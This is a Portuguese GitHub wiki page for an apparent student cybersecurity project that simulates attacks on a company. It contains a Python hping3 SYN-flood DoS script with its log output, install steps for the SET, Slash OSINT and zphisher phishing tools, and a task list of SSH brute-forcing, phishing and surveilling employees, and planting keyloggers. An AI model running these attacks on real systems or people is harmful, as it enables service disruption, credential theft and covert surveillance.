Skip to content

Projeto Cyber Segurança (Ataque)

Estevam edited this page Oct 7, 2023 · 11 revisions

kali-red-sticker

Vamos Atacar a empresa com softwares e vírus maliciosos

Software's para uso de penetração:

Hypher3

import os
import subprocess

target_ip = "192.168.3.200"
log_file = "/var/log/suricata/fast.log"

# Comando hping3
command = f"hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source {target_ip}"

# Abre o arquivo de log em modo de escrita e redireciona a saída do comando para o arquivo
with open(log_file, "w") as log:
    subprocess.call(command, shell=True, stdout=log, stderr=log)

Log no terminal

sudo tail -f /var/log/suricata/fast.log
hping in flood mode, no replies will be shown

--- 192.168.3.200 hping statistic ---
1100330 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
HPING 192.168.3.200 (wlp2s0 192.168.3.200): S set, 40 headers + 120 data bytes

O comando sudo python dos_attack.py está executando um script Python chamado dos_attack.py com privilégios de superusuário (root) usando o sudo. Vou explicar o que esse comando está fazendo:

sudo: É um comando que permite que você execute outros comandos com privilégios de superusuário (root). O uso do sudo geralmente requer autenticação, então você precisa fornecer a senha do superusuário quando solicitado.

O script Python dos_attack.py parece estar usando a ferramenta hping3 para realizar um ataque de negação de serviço (DoS) em um endereço IP específico (192.168.1.113) e na porta 21 (FTP). O ataque envolve o envio de uma grande quantidade de pacotes SYN, que são usados para iniciar uma conexão TCP, mas sem esperar por uma resposta (flood mode). O hping3 está configurado para não exibir as respostas, conforme indicado pela mensagem "no replies will be shown".

É importante observar que a realização de um ataque de negação de serviço (DoS) em sistemas ou redes sem permissão explícita é ilegal e antiética. Além disso, pode causar interrupções nos serviços e causar problemas de rede. Esse tipo de atividade deve ser realizado apenas em um ambiente controlado e para fins de teste ou pesquisa legítima, com permissão apropriada. Certifique-se de entender as implicações legais e éticas antes de realizar esse tipo de teste ou ataque.

Hydra

Keylogger

Engenharia Social

setoolkit

The Social-Engineer Toolkit (SET)

  • Copyright ©️ 2020
  • Written by: David Kennedy (ReL1K) @HackingDave
  • Company: TrustedSec

Description

The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC – an information security consulting firm located in Cleveland, Ohio.

DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period. Please read the LICENSE under readme/LICENSE for the licensing of SET.

Supported platforms:

  • Linux
  • Mac OS X (experimental)

Installation

Install via requirements.txt

pip3 install -r requirements.txt
python3 setup.py 

Install SET

=======

  • Mac OS X

Installation

Windows 10 WSL/WSL2 Kali Linux

sudo apt install set -y

Kali Linux on Windows 10 is a minimal installation so it doesn't have any tools installed. You can easily install Social Engineer Toolkit on WSL/WSL2 without needing pip using the above command.

Linux

git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/
cd setoolkit
python3 -m venv .venv
source .venv/bin/activate    
pip3 install -r requirements.txt
python3 setup.py
sudo setoolkit

SET Tutorial

For a full document on how to use SET, visit the SET user manual.


Bugs and enhancements

For bug reports or enhancements, please open an issue here.

Slash

Slash é uma Ferramenta Osint Automatizada que permite OSINT pessoas pelo nome de usuário.

Slash OSINT Modulos :

|__Checker                                                    |
|  |                                                          |
|  |__Social Media Profile Check (+187)                       |
|  |__Forums Profile Check (+30)                              |
|  |__Leak Check (Username,Email-Adress)                      |
|                                                             |
|__Search                                                     |
|  |                                                          |
|  |__Pastebin Paste Search                                   |
|  |__Github Commit Search                                    |
|                                                             |
|__Extract Scrape                                             |
|  |                                                          |
|  |__Phone Number Extract      (From Bios,Raw Texts)         |
|  |__Mail Extractor            (From Bios,Raw Texts)         |
|  |__Bio Scraper               (Social Media)                |
|  |__Name Scraper              (Social Media)                |
|  |__Location Scraper          (Social Media)                |
|  |__Education Info Scraper    (Social Media)                |
|  |__Personal Website Scraper  (Social Media)                |
|__|__________________________________________________________|

Instalação

git clone https://github.com/theahmadov/slash
cd slash
pip install -r requirements.txt
python slash.py help

Syntax

  • Username Syntax : python slash.py username

  • Mail Adress Syntax : python slash.py mail_adress

  • Examplo :

python slash.py theahmadov

Código em python:

import typer
from os import system
import time

from profiles import profiles
from forums import forums 

from core import (
    banner,
    color,
    symbol,
    clear
)
from core.check import *
import threading
import argparse 

from api.pastebin import search as pastesearch
from api.github import search as githubsearch
from api.extract import extract as extract 
from api.leakcheck import check as leakcheck 



def gethelp():
    print(f"""{symbol.help_found}:
    {color.redbg}Slash{color.reset} Includes : 
        {color.bold}paste{color.reset} search
        {color.bold}social media{color.reset} search
        {color.bold}forum{color.reset} search
        {color.bold}leak check{color.reset}

    Example :
    {color.graybg}{color.red}{color.bold}${color.reset}{color.graybg} python slash.py Ahmadov{color.reset}
    {color.graybg}{color.red}{color.bold}${color.reset}{color.graybg} python slash.py target@gmail.com{color.reset}""")

def _username(username):
    print(f"{symbol.log} {symbol.slash} starting...")
    print(f"{symbol.log} Username [{color.green}{color.bold}{username}{color.reset}] succesfully setted.")
    threading.Thread(target=profiles.run,args=(username,)).start()
    threading.Thread(target=forums.run,args=(username,)).start()
    time.sleep(5)
    try:threading.Thread(target=pastesearch,args=(username,)).start()
    except:pass
    try:threading.Thread(target=githubsearch,args=(username,)).start()
    except:pass

def _mail(mail_adress):
    print(f"{symbol.log} {symbol.slash} starting...")
    print(f"{symbol.log} Mail adress [{color.green}{color.bold}{mail_adress}{color.reset}] succesfully setted.")
    
    threading.Thread(target=leakcheck,args=(mail_adress,)).start()
    time.sleep(3)
    threading.Thread(target=pastesearch,args=(mail_adress,)).start()
    threading.Thread(target=githubsearch,args=(mail_adress,)).start()


    
def _start(value : str):

    if(value=="/" or value=="h" or value=='help'):
        gethelp()
    elif(len(extract.just.mail(value))!=0):
        _mail(value)
    elif(len(extract.just.phone(value))!=0):
        pass
    else:
        _username(value)

if __name__ == "__main__":
    clear()
    print(banner.slash)
    #_start()
    typer.run(_start)

# By Ahmadov...

Phisher

Features

  • Latest and updated login pages.
  • Beginners friendly
  • Multiple tunneling options
    • Localhost
    • Cloudflared
    • LocalXpose
  • Mask URL support
  • Docker support

Installation

  • Just, Clone this repository -

    git clone --depth=1 https://github.com/htr-tech/zphisher.git
    
  • Now go to cloned directory and run zphisher.sh -

    $ cd zphisher
    $ bash zphisher.sh
    
  • On first launch, It'll install the dependencies and that's it. Zphisher is installed.

Installation (Termux)

You can easily install zphisher in Termux by using tur-repo

$ pkg install tur-repo
$ pkg install zphisher
$ zphisher

A Note :

Termux discourages hacking .. So never discuss anything related to zphisher in any of the termux discussion groups. For more check : wiki

Installation via ".deb" file

  • Download .deb files from the Latest Release

  • If you are using termux then download the *_termux.deb

  • Install the .deb file by executing

    apt install <your path to deb file>
    

    Or

    $ dpkg -i <your path to deb file>
    $ apt install -f
    

Run on Docker

  • Docker Image Mirror:

    • DockerHub :
      docker pull htrtech/zphisher
      
    • GHCR :
      docker pull ghcr.io/htr-tech/zphisher:latest
      
  • By using the wrapper script run-docker.sh

    $ curl -LO https://raw.githubusercontent.com/htr-tech/zphisher/master/run-docker.sh
    $ bash run-docker.sh
    
  • Temporary Container

    docker run --rm -ti htrtech/zphisher
    
    • Remember to mount the auth directory.

Dependencies

Zphisher requires following programs to run properly -

  • git
  • curl
  • php

All the dependencies will be installed automatically when you run Zphisher for the first time.

Tested on

  • Ubuntu
  • Debian
  • Arch
  • Manjaro
  • Fedora
  • Termux

Empresa

  • Apresentação do trabalho
  • Colocar os dados da empresa no site da mesma
  • Ativar os serviços ssh

Segurança

  • Apresentação do trabalho
  • Apresentar as normas de segurança (ISO) para a empresa (em PDF)
  • Analisar a vulnerabilidade do servidor e do site
  • Utilizar para testar a vulnerabilidade de senha do ssh com o Hydra
  • Em tempo real, utilizar um software para detectar ataque de força bruta do Hydra ao servidor ssh
  • Gerar um relatório de ataque Dos com o SURICATA
  • Utilizar o nmap para verificar se as portas estão fechadas e colocar isso ao relatório

Ataque

  • Apresentação do trabalho
  • Realizar ataque de força bruta com Hydra
  • Realizar um ataque com o Hypher3 (Envio de pacotes em massa (Apenas 10 segundos são enviados mais de 100000 pacotes no ip do servidor ou da internet)) (Gravar um vídeo pois esse ataque é extremamente perigoso e não podemos comprometer com o ip da Estácio, fazer isso em outro local gravando um vídeo para mostrar esse poderoso ataque de Hacker)
  • Vigiar funcionários da empresa com Slash
  • Realizar ataque social ou Engenharia Social com setoolkit
  • Ataque com Phisher ao e-mail da empresa, redes sociais de funcionários
  • Colocar um arquivo de keylogger nos computadores da empresa, através do ip do servidor com ssh
Clone this wiki locally